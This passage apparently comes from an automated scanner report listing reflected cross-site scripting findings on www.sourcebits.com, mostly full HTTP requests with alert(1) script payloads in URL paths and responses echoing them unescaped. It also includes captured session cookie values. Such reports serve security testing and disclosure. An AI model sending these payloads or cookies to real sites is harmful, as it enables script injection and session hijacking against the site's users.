Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:04 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css3d16d"><script>alert(1)</script>d0e0fc3dcca/404.css?1292234335" />
...[SNIP]...

1.23. http://www.sourcebits.com/css/404.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/404.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 88dd0<script>alert(1)</script>46ed298eda0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/404.css88dd0<script>alert(1)</script>46ed298eda0?1292234335 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:18 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css/404.css88dd0<script>alert(1)</script>46ed298eda0?1292234335</h2>
...[SNIP]...

1.24. http://www.sourcebits.com/css/404.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/404.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae49e"><script>alert(1)</script>0ac57c054c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/404.cssae49e"><script>alert(1)</script>0ac57c054c1?1292234335 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:16 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css/404.cssae49e"><script>alert(1)</script>0ac57c054c1?1292234335" />
...[SNIP]...

1.25. http://www.sourcebits.com/css/colorbox.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/colorbox.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74c7d"><script>alert(1)</script>8657e0fbadd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css74c7d"><script>alert(1)</script>8657e0fbadd/colorbox.css?1292234336 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/design
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:17 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css74c7d"><script>alert(1)</script>8657e0fbadd/colorbox.css?1292234336" />
...[SNIP]...

1.26. http://www.sourcebits.com/css/colorbox.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/colorbox.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1f2b7<script>alert(1)</script>3ec9084c37a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css1f2b7<script>alert(1)</script>3ec9084c37a/colorbox.css?1292234336 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/design
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:19 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css1f2b7<script>alert(1)</script>3ec9084c37a/colorbox.css?1292234336</h2>
...[SNIP]...

1.27. http://www.sourcebits.com/css/colorbox.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/colorbox.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3945b<script>alert(1)</script>5c1e51610db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/colorbox.css3945b<script>alert(1)</script>5c1e51610db?1292234336 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/design
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:32 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css/colorbox.css3945b<script>alert(1)</script>5c1e51610db?1292234336</h2>
...[SNIP]...

1.28. http://www.sourcebits.com/css/colorbox.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/colorbox.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae809"><script>alert(1)</script>4daeb0b06a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/colorbox.cssae809"><script>alert(1)</script>4daeb0b06a9?1292234336 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/design
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:30 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css/colorbox.cssae809"><script>alert(1)</script>4daeb0b06a9?1292234336" />
...[SNIP]...

1.29. http://www.sourcebits.com/css/components.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/components.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38be1<script>alert(1)</script>7fafc427363 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css38be1<script>alert(1)</script>7fafc427363/components.css?1292234336 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:12 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css38be1<script>alert(1)</script>7fafc427363/components.css?1292234336</h2>
...[SNIP]...

1.30. http://www.sourcebits.com/css/components.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/components.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24402"><script>alert(1)</script>2767f158784 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css24402"><script>alert(1)</script>2767f158784/components.css?1292234336 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:09 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css24402"><script>alert(1)</script>2767f158784/components.css?1292234336" />
...[SNIP]...

1.31. http://www.sourcebits.com/css/components.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/components.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5a246<script>alert(1)</script>719e1cebf86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/components.css5a246<script>alert(1)</script>719e1cebf86?1292234336 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:25 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css/components.css5a246<script>alert(1)</script>719e1cebf86?1292234336</h2>
...[SNIP]...

1.32. http://www.sourcebits.com/css/components.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/components.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f19"><script>alert(1)</script>4731736a1b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/components.css20f19"><script>alert(1)</script>4731736a1b8?1292234336 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/iphone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:22 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css/components.css20f19"><script>alert(1)</script>4731736a1b8?1292234336" />
...[SNIP]...

1.33. http://www.sourcebits.com/css/home.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/home.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5c056<script>alert(1)</script>f893d4da48e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css5c056<script>alert(1)</script>f893d4da48e/home.css?1305902900 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:10 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css5c056<script>alert(1)</script>f893d4da48e/home.css?1305902900</h2>
...[SNIP]...

1.34. http://www.sourcebits.com/css/home.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/home.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfbb2"><script>alert(1)</script>5df92099c8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssbfbb2"><script>alert(1)</script>5df92099c8f/home.css?1305902900 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:04 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/cssbfbb2"><script>alert(1)</script>5df92099c8f/home.css?1305902900" />
...[SNIP]...

1.35. http://www.sourcebits.com/css/home.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/home.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8ac3"><script>alert(1)</script>ce3546596cf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/home.cssb8ac3"><script>alert(1)</script>ce3546596cf?1305902900 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:21 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/css/home.cssb8ac3"><script>alert(1)</script>ce3546596cf?1305902900" />
...[SNIP]...

1.36. http://www.sourcebits.com/css/home.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/home.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 398f9<script>alert(1)</script>3a00bb57702 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/home.css398f9<script>alert(1)</script>3a00bb57702?1305902900 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:29 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/css/home.css398f9<script>alert(1)</script>3a00bb57702?1305902900</h2>
...[SNIP]...

1.37. http://www.sourcebits.com/css/lightbox.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /css/lightbox.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0211<script>alert(1)</script>9ec8785078a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssd0211<script>alert(1)</script>9ec8785078a/lightbox.css?1292234337 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
